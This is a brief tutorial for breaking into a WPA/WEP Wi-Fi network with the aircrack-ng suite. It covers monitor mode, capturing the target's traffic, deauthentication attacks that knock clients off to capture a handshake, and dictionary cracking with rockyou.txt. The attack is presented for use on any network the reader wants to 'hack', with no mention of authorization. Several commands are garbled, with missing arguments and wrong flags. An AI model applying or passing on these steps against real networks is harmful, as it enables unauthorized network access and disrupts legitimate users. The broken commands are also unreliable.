Hack wifi using Aircrack-ng 1.Setting up the monitor interface to make the traffic visible #airmon-ng start airmon-ng start wlan0 2.Capturing the traffic using airodump-ng #airodump-ng airodump-ng wlan0mon 3.Consider a wifi which you want to hack . Note its channel no, bssid #airodump-ng -c --bssid -w airodump-ng -c 11 -bssid ------------ -w /home/Desktop wlan0mon 4.Now,the handshake files are created.We can start for a handshake using aireplay-ng.Type the below command in another terminal #aireplay-ng -a -e --deauth 2 5.We can see that the wifi received its handshake. The encrypted passwords are captured in the handshake file and we need to crack them using a wordlist file. Wordlist files are by default available in kali linux. Search rockyou.txt in wordlistfile aircrack-ng -b -a -w -a is attack type WPA2-2 WEP-1 6.The handshake files go on through the wordlist file and crack the password!!!! Note:During this process wifi gets disconnected to reconect type below commands #airmon-ng stop airmon-ng stop wlan0mon service network-manager restart